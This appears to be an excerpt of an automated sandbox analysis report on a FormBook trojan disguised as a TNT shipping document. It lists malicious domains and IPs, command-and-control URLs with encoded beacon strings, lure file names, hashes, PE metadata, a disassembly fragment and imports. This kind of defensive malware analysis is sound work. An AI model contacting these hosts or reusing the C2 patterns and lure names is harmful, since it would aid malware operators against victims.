http://www.borghardt.xyz/jd21/www.slab-leak-repair-74697.bond | explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.circusenergy.online/jd21/ | explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.xmld101.icuReferer: | explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al | explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.borghardt.xyzReferer: | explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.53.179.92 | www.pools-80761.bond | Germany | 61969 | TEAMINTERNET-ASDE | true
185.53.179.93 | www.walk-in-tubs-30303.bond | Germany | 61969 | TEAMINTERNET-ASDE | true
188.114.96.3 | www.weight-loss-003.today | European Union | 13335 | CLOUDFLARENETUS | true
185.134.245.113 | www.circusenergy.online | Norway | 12996 | DOMENESHOPOsloNorwayNO | true
77.37.37.36 | legendhud.shop | Germany | 31400 | ACCELERATED-ITDE | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1517909
Start date and time: 2024-09-25 09:05:25 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 54s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: TNT AWB TRACKING DETAILS.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@304/1@12/5
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 57
• Number of non-executed functions: 294
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: TNT AWB TRACKING DETAILS.exe
Time | Type | Description
03:06:37 | API Interceptor | 8410044x Sleep call for process: explorer.exe modified
03:07:10 | API Interceptor | 7492145x Sleep call for process: wlanext.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.53.179.92 | COM404 PDF.exe | malicious | FormBook | www.online-gaming-66785.bond/he2a/?9r9Hc=ivWl&NtxTwXO=/hGdMBZyum5W4qtIJyLtA9fBMnlFOJpmlvcb/w4pljM3rKnmSOUNR8RWZTuid8vspaGbtSwNHA==
185.53.179.92 | Orden de compra 0307AR24.exe | malicious | FormBook | www.ux-design-courses-17184.bond/md02/?TPXh=O2vdgLwRhMAgOHoS701s4xS4xJeZ/+uwNgHwz2yOIOwCqMZJzZYnLthi8nNL68HJ3+dRBVTqOQ==&nHLDZb=8p-HvnKhThQhTxm
185.53.179.92 | Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe | malicious | FormBook | www.hemophilia-treatment-41433.bond/pz12/?Ft6LPF=I28W/3a7leZLTJTVQ6pLzOFASFQBM/RHJVT607x5WCzJ2jZGT2NOi6Mb2MIHH5pYEuLB&Ev2=OjrLPv0Hh4WLu
185.53.179.92 | PO_0049_&_0050.xls | malicious | FormBook | www.family-doctor-30030.com/my28/?h2Jdv=79IGywBWJhGw8mHY4Ed55Qbw0iEgtBEh+S8JDPa/nYZjsEVgaC4IJbnYN4OFlpxaLyr5Lg==&9rQ=c48da8_XbVvlJH8
185.53.179.92 | E-dekont.exe | malicious | FormBook, GuLoader | www.cruises-62138.bond/my26/?l4DHGh=DhxFqfI9N7ytGMr7+SOPlgLH0+mxXzpNvffODTnmnzF1LX8PasEKVGrRTADD59/oI3Me&p41P=mVDhw
185.53.179.92 | Ziraat_Bankasi_Swift_Mesaji.exe | malicious | FormBook, GuLoader | www.cruises-62138.bond/my26/?FD=DhxFqfI9N7ytGMr7+SOPlgLH0+mxXzpNvffODTnmnzF1LX8PasEKVGrRTADD59/oI3Me&8psPYP=k4Hh
185.53.179.92 | E-dekont.exe | malicious | FormBook, GuLoader | www.cruises-62138.bond/my26/?f8HLWH=DhxFqfI9N7ytGMr7+SOPlgLH0+mxXzpNvffODTnmnzF1LX8PasEKVGrRTADD59/oI3Me&0T=Z87P2TP
185.53.179.92 | Ziraat_Bankasi_Swift_Mesaji.exe | malicious | FormBook, GuLoader | www.cruises-62138.bond/my26/?k4p=DhxFqfI9N7ytGMr7+SOPlgLH0+mxXzpNvffODTnmnzF1LX8PasEKVGrRTADD59/oI3Me&ijc=1bxDp
185.53.179.92 | Ziraat_Bankasi_Swift_Mesaji.exe | malicious | FormBook, GuLoader | www.cruises-62138.bond/my26/?q4=DhxFqfI9N7ytGMr7+SOPlgLH0+mxXzpNvffODTnmnzF1LX8PasEKVGrRTADD59/oI3Me&5jdh=DPxH-Ti82
185.53.179.92 | E-dekont.exe | malicious | FormBook, GuLoader | www.cruises-62138.bond/my26/?_fvPp=DhxFqfI9N7ytGMr7+SOPlgLH0+mxXzpNvffODTnmnzF1LX8PasEKVGrRTADD59/oI3Me&6lo8sx=KtF83LWPF
185.53.179.93 | DPPLYAD_12872 PDF.exe | malicious | FormBook | www.influencer-marketing-47216.bond/he2a/?nN=Sxl0i64hVtElz&CPG=84/fs4NIs15aEXqKDdXxWbs8wsGB+NHFSJU+jeYjKKNMPhGfzDAaf2frC9w/jls3PXKW
185.53.179.93 | DHL SHIPPING DOCUMENT.exe | malicious | FormBook | www.stress-relief-44110.bond/jd21/?ob4t_tGP=WFlpkkyn+BDxDNVRAZhlfyliDB7yOKGW8w90QluphSZSwYX7XSmCpSriaZ6fRHTWFXuNNuNFMw==&BnS=gdiT6Fgho0hl
185.53.179.93 | DHL SHIPPING DOCUMENT.exe | malicious | FormBook | www.stress-relief-44110.bond/jd21/?lH0=WFlpkkyn+BDxDNVRAZhlfyliDB7yOKGW8w90QluphSZSwYX7XSmCpSriaZ2mdm/WSRyc&lf28=I2MdzbjH5B0P
185.53.179.93 | DHL_TOC2_2407081728458457.pdf.exe | malicious | FormBook | www.cameras-30514.bond/rn94/?vB=lf5P&Txo=lgoizE4pNYtxCOmOxzD8L5p+lA3qLSKEOo6jBStnDh5AReX7kYuYzSwx+/h0WveL3C1X
185.53.179.93 | 4LPk0o7T6C.exe | malicious | FormBook | www.cameras-30514.bond/rn94/?CZbDp=fTeDovxhSZ2T70J&2ds=lgoizE4pNYtxCOmOxzD8L5p+lA3qLSKEOo6jBStnDh5AReX7kYuYzSwx+/h0WveL3C1X
185.53.179.93 | DHL AWB DOCUMENT.pdf.exe | malicious | FormBook | www.cameras-30514.bond/rn94/?1bY=lgoizE4pNYtxCOmOxzD8L5p+lA3qLSKEOo6jBStnDh5AReX7kYuYzSwx+8BrdPOztlId&Ejf=3fSHwbBPFx2LVVzP
185.53.179.93 | LrhyzIl40E4GDdy.exe | malicious | FormBook | www.furniture-70925.bond/cr12/?Et08lJ=XDKPfBipy&J48=Z2oUF1m4elERiz7Ex45taoW4BZHJdwPpAy0MxX0cF9HtIbM34bdf89HCNVI2e3JPTorjxusTzw==
185.53.179.93 | PO TRO-1075 - TRO-1076 904504608468.pdf.exe | malicious | FormBook | www.cameras-30514.bond/rn94/?UTF4x=lgoizE4pNYtxCOmOxzD8L5p+lA3qLSKEOo6jBStnDh5AReX7kYuYzSwx+/h0WveL3C1X&WXr=jDKXzfrpmlKTeV
185.53.179.93 | EKSTRE_06.08.exe | malicious | FormBook, NSISDropper | www.fashion-clothing-40094.com/a04y/?lR-4=kf2pTR4VeO7lT7Z2mQjWW9EM/kzbt5pVVhNCWcIafITiEZY5EVN/5vtXeaVLQc5XGXSQ&Hr=k2JdV
185.53.179.93 | RFQ_39250100.exe | malicious | FormBook, GuLoader | www.internet-providers-45067.com/o17i/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.pools-80761.bond | DHL SHIPPING DOCUMENT.exe | malicious | FormBook | 185.53.179.92
www.weight-loss-003.today | DHL SHIPPING DOCUMENT.exe | malicious | FormBook | 188.114.97.3
www.weight-loss-003.today | DHL SHIPPING DOCUMENT.exe | malicious | FormBook | 188.114.97.3
www.circusenergy.online | DHL SHIPPING DOCUMENT.exe | malicious | FormBook | 185.134.245.113
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | NEW ORDER.xls | malicious | Unknown | 188.114.96.3
CLOUDFLARENETUS | COMMERCAIL INVOICE AND TNT AWB TRACKING INVOICE.exe | malicious | AgentTesla | 104.26.12.205
CLOUDFLARENETUS | Document.xls | malicious | Unknown | 188.114.96.3
CLOUDFLARENETUS | Payment_Advise.exe | malicious | GuLoader | 172.67.146.197
CLOUDFLARENETUS | Document.xls | malicious | Unknown | 188.114.97.3
CLOUDFLARENETUS | New_Document-0706282.js | malicious | Unknown | 188.114.96.3
CLOUDFLARENETUS | SPEC.xls | malicious | Remcos, PureLog Stealer | 188.114.96.3
CLOUDFLARENETUS | https://download.devscope.net/setups/PowerBITiles/PowerBITilesDesktopPowerPoint.zip | malicious | Unknown | 1.1.1.1
CLOUDFLARENETUS | New_Document-0706282.js | malicious | Unknown | 188.114.97.3
CLOUDFLARENETUS | QUOTATION_SEPQTRA071244PDF.scr.exe | malicious | Snake Keylogger | 188.114.96.3
DOMENESHOPOsloNorwayNO | GestionPagoAProveedores_100920241725998901306_PDF.cmd | malicious | Remcos, DBatLoader, FormBook | 185.134.245.113
DOMENESHOPOsloNorwayNO | FATURALAR PDF.exe | malicious | FormBook | 185.134.245.113
DOMENESHOPOsloNorwayNO | New Purchase Order.exe | malicious | FormBook | 185.134.245.113
DOMENESHOPOsloNorwayNO | Scan 00093847.exe | malicious | FormBook | 185.134.245.113
DOMENESHOPOsloNorwayNO | REQUEST FOR QUOTATION.exe | malicious | FormBook, GuLoader | 185.134.245.113
DOMENESHOPOsloNorwayNO | PO TIYEY078K.exe | malicious | FormBook, PureLog Stealer | 185.134.245.114
DOMENESHOPOsloNorwayNO | PO AFHOR9301604.exe | malicious | FormBook | 185.134.245.113
DOMENESHOPOsloNorwayNO | DHL SHIPPING DOCUMENT.exe | malicious | FormBook | 185.134.245.113
DOMENESHOPOsloNorwayNO | Quote - V-24-TOS-082.exe | malicious | FormBook | 185.134.245.113
DOMENESHOPOsloNorwayNO | aaL1b0cQ49.exe | malicious | FormBook | 194.63.248.52
TEAMINTERNET-ASDE | ORDER_1105-19-24-3537.pdf.exe | malicious | FormBook | 185.53.179.90
TEAMINTERNET-ASDE | ActSet.ps1 | malicious | Fredy Stealer | 185.53.177.31
TEAMINTERNET-ASDE | ActSet.ps1 | malicious | Fredy Stealer | 185.53.177.31
TEAMINTERNET-ASDE | SecuriteInfo.com.Win32.Sector.30.19697.26848.exe | malicious | Sality | 185.53.178.50
TEAMINTERNET-ASDE | t5ueYgHiHnIdeNe.exe | malicious | FormBook | 185.53.179.90
TEAMINTERNET-ASDE | IDMan.exe | malicious | Fredy Stealer | 185.53.177.31
TEAMINTERNET-ASDE | IDMan.exe | malicious | Fredy Stealer | 185.53.177.31
TEAMINTERNET-ASDE | firmware.armv4l.elf | malicious | Unknown | 185.53.178.51
TEAMINTERNET-ASDE | firmware.armv5l.elf | malicious | Unknown | 185.53.178.51
TEAMINTERNET-ASDE | firmware.armv7l.elf | malicious | Unknown | 185.53.177.50
                                    No context
                                    No context
Process: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe
File Type: data
Category: dropped
Size (bytes): 189952
Entropy (8bit): 7.879300915522741
Encrypted: false
SSDEEP: 3072:uW2JW+t2LnMm6kB5E3ltiszb1Kja0m95kJLjHqtugIZl8FqWFZotS9JCy/:YwLMn3visIpmeJXnP840PJD/
MD5: 984F9F33FD5214D019BED7AB61E51BD7
SHA1: B82C31CA900C78600041CDF8BF9370668A655FE2
SHA-256: 406475333C6BD86F84264D0DC0A90EF8A0F7FF299FBC0D2D74089C4A759F7823
SHA-512: 72B2E1DD7FD011B10B0B63D3AC552F32A828355BF71BD6226600812BFE2751552CAE008B30C40A73F53FA3493899CDEB5D6194EB55C455598F63902BD6CDA0D2
Malicious: false
Reputation: low
Preview: ...j.4AU2..N...k.66...IZ..BM8B4AU2TOSGKDHHWU65WWEWJR1YUB.8B4OJ.ZO.N.e.I...a?>6w: ^>'# .!U/;] o1"k6=&w<X....w'=U<{O@2f4AU2TOS4Zq..'...'..`:...S..I2o..4..g7...N...E...>):.)..M8B4AU2T..GK.IIWCv..WEWJR1YU.M:C?@_2T.QGKDHHWU65..DWJB1YU.O8B4.U2DOSGIDHMWT65WWERJS1YUBM8.6AU0TOSGKDJH..65GWEGJR1YEBM(B4AU2T_SGKDHHWU65WWEWJR1YUBM8B4AU2TOSGKDHHWU65WWEWJR1YUBM8B4AU2TOSGKDHHWU65WWEWJR1YUBM8B4AU2TOSGKDHHWU65WWEWJR1YUBM8B4AU2TOSGKDHHWU65WWEWJ|E<-6M8B0.W2T_SGK.JHWE65WWEWJR1YUBM8b4A52TOSGKDHHWU65WWEWJR1YUBM8B4AU2TOSGKDHHWU65WWEWJR1YUBM8B4AU2TOSGKDHHWU65WWEWJR1YUBM8B4AU2TOSGKDHHWU65WWEWJR1YUBM8B4AU2TOSGKDHHWU65WWEWJR1YUBM8B4AU2TOSGKDHHWU65WWEWJR1YUBM8B4AU2TOSGKDHHWU65WWEWJR1YUBM8B4AU2TOSGKDHHWU65WWEWJR1YUBM8B4AU2TOSGKDHHWU65WWEWJR1YUBM8B4AU2TOSGKDHHWU65WWEWJR1YUBM8B4AU2TOSGKDHHWU65WWEWJR1YUBM8B4AU2TOSGKDHHWU65WWEWJR1YUBM8B4AU2TOSGKDHHWU65WWEWJR1YUBM8B4AU2TOSGKDHHWU65WWEWJR1YUBM8B4AU2TOSGKDHHWU65WWEWJR1YUBM8B4AU2TOSGKDHHWU65WWEWJR1YUBM8B4AU2TOSGKDHHWU65WWEWJR1YUBM8B4AU2TOSGKDHHWU65WWEWJR1YUBM8B4AU2TOSGK
                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):7.3898567700817095
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:TNT AWB TRACKING DETAILS.exe
                                    File size:1'135'963 bytes
                                    MD5:b49edb762958e81c098b4869ba26a78c
                                    SHA1:152bda24aa1bd2b8f6eff91f214ebf1701062a7e
                                    SHA256:58892474694c1aff444adca37753e52b93fffce8bb98b75d488ec3df2c87b2da
                                    SHA512:305621b6ded9f58155036348d65f6d01891b99f9d4d5c480a973419d597a8b1e95ed33a60641df0e3025eb3e97042d73f4d2362ef70e1554bdfabcdd592e8175
                                    SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCfdG8gHowXUy4b59IRGEP4gnV:7JZoQrbTFZY1iaCFGdUyC9IRGEP44
                                    TLSH:AF35E121F5D68036C1B323B19E7FF76A963D69360336D19727C82E321EA05416B2A773
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..
                                    Icon Hash:1733312925935517
                                    Entrypoint:0x4165c1
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                    Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:0
                                    File Version Major:5
                                    File Version Minor:0
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:0
                                    Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378
                                    Instruction
                                    call 00007FD8F94CC02Bh
                                    jmp 00007FD8F94C2E9Eh
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    push ebp
                                    mov ebp, esp
                                    push edi
                                    push esi
                                    mov esi, dword ptr [ebp+0Ch]
                                    mov ecx, dword ptr [ebp+10h]
                                    mov edi, dword ptr [ebp+08h]
                                    mov eax, ecx
                                    mov edx, ecx
                                    add eax, esi
                                    cmp edi, esi
                                    jbe 00007FD8F94C301Ah
                                    cmp edi, eax
                                    jc 00007FD8F94C31B6h
                                    cmp ecx, 00000080h
                                    jc 00007FD8F94C302Eh
                                    cmp dword ptr [004A9724h], 00000000h
                                    je 00007FD8F94C3025h
                                    push edi
                                    push esi
                                    and edi, 0Fh
                                    and esi, 0Fh
                                    cmp edi, esi
                                    pop esi
                                    pop edi
                                    jne 00007FD8F94C3017h
                                    jmp 00007FD8F94C33F2h
                                    test edi, 00000003h
                                    jne 00007FD8F94C3026h
                                    shr ecx, 02h
                                    and edx, 03h
                                    cmp ecx, 08h
                                    jc 00007FD8F94C303Bh
                                    rep movsd
                                    jmp dword ptr [00416740h+edx*4]
                                    mov eax, edi
                                    mov edx, 00000003h
                                    sub ecx, 04h
                                    jc 00007FD8F94C301Eh
                                    and eax, 03h
                                    add ecx, eax
                                    jmp dword ptr [00416654h+eax*4]
                                    jmp dword ptr [00416750h+ecx*4]
                                    nop
                                    jmp dword ptr [004166D4h+ecx*4]
                                    nop
                                    inc cx
                                    add byte ptr [eax-4BFFBE9Ah], dl
                                    inc cx
                                    add byte ptr [ebx], ah
                                    ror dword ptr [edx-75F877FAh], 1
                                    inc esi
                                    add dword ptr [eax+468A0147h], ecx
                                    add al, cl
                                    jmp 00007FD8FB93B817h
                                    add esi, 03h
                                    add edi, 03h
                                    cmp ecx, 08h
                                    jc 00007FD8F94C2FDEh
                                    rep movsd
                                    jmp dword ptr [00000000h+edx*4]
                                    Programming Language:
                                    • [ C ] VS2010 SP1 build 40219
                                    • [C++] VS2010 SP1 build 40219
                                    • [ C ] VS2008 SP1 build 30729
                                    • [IMP] VS2008 SP1 build 30729
                                    • [ASM] VS2010 SP1 build 40219
                                    • [RES] VS2010 SP1 build 40219
                                    • [LNK] VS2010 SP1 build 40219
                                    Name | Virtual Address | Virtual Size | Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8d41c | 0x154 | .rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xab000 | 0x9328 | .rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_IAT | 0x82000 | 0x844 | .rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                    Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                    .text | 0x1000 | 0x8061c | 0x80800 | 61ffce4768976fa0dd2a8f6a97b1417a | False | 0.5583182605787937 | data | 6.684690148171278 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rdata | 0x82000 | 0xdfc0 | 0xe000 | 0354bc5f2376b5e9a4a3ba38b682dff1 | False | 0.36085728236607145 | data | 4.799741132252136 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data | 0x90000 | 0x1a758 | 0x6800 | 8033f5a38941b4685bc2299e78f31221 | False | 0.15324519230769232 | data | 2.1500715391677487 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rsrc | 0xab000 | 0x9328 | 0x9400 | 495451d7eb8326bd9fa2714869ea6de8 | False | 0.49002322635135137 | data | 5.541804843154628 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                    RT_ICON | 0xab5c8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
                                    RT_ICON | 0xab6f0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
                                    RT_ICON | 0xab818 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
                                    RT_ICON | 0xab940 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | Great Britain | 0.48109756097560974
                                    RT_ICON | 0xabfa8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | Great Britain | 0.5672043010752689
                                    RT_ICON | 0xac290 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | Great Britain | 0.6418918918918919
                                    RT_ICON | 0xac3b8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | Great Britain | 0.7044243070362474
                                    RT_ICON | 0xad260 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | Great Britain | 0.8077617328519856
                                    RT_ICON | 0xadb08 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | Great Britain | 0.5903179190751445
                                    RT_ICON | 0xae070 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | Great Britain | 0.5503112033195021
                                    RT_ICON | 0xb0618 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | Great Britain | 0.6050656660412758
                                    RT_ICON | 0xb16c0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | Great Britain | 0.7553191489361702
                                    RT_MENU | 0xb1b28 | 0x50 | data | English | Great Britain | 0.9
                                    RT_DIALOG | 0xb1b78 | 0xfc | data | English | Great Britain | 0.6507936507936508
                                    RT_STRING | 0xb1c78 | 0x530 | data | English | Great Britain | 0.33960843373493976
                                    RT_STRING | 0xb21a8 | 0x690 | data | English | Great Britain | 0.26964285714285713
                                    RT_STRING | 0xb2838 | 0x4d0 | data | English | Great Britain | 0.36363636363636365
                                    RT_STRING | 0xb2d08 | 0x5fc | data | English | Great Britain | 0.3087467362924282
                                    RT_STRING | 0xb3308 | 0x65c | data | English | Great Britain | 0.34336609336609336
                                    RT_STRING | 0xb3968 | 0x388 | data | English | Great Britain | 0.377212389380531
                                    RT_STRING | 0xb3cf0 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | United States | 0.502906976744186
                                    RT_GROUP_ICON | 0xb3e48 | 0x84 | data | English | Great Britain | 0.6439393939393939
                                    RT_GROUP_ICON | 0xb3ed0 | 0x14 | data | English | Great Britain | 1.15
                                    RT_GROUP_ICON | 0xb3ee8 | 0x14 | data | English | Great Britain | 1.25
                                    RT_GROUP_ICON | 0xb3f00 | 0x14 | data | English | Great Britain | 1.25
                                    RT_VERSION | 0xb3f18 | 0x19c | data | English | Great Britain | 0.5339805825242718
                                    RT_MANIFEST | 0xb40b8 | 0x26c | ASCII text, with CRLF line terminators | English | United States | 0.5145161290322581
                                    DLL | Import
                                    WSOCK32.dll | __WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                    VERSION.dll | VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                    WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
                                    COMCTL32.dll | ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                    MPR.dll | WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                    WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                    PSAPI.DLL | EnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                    USERENV.dll | CreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                    KERNEL32.dll | HeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, 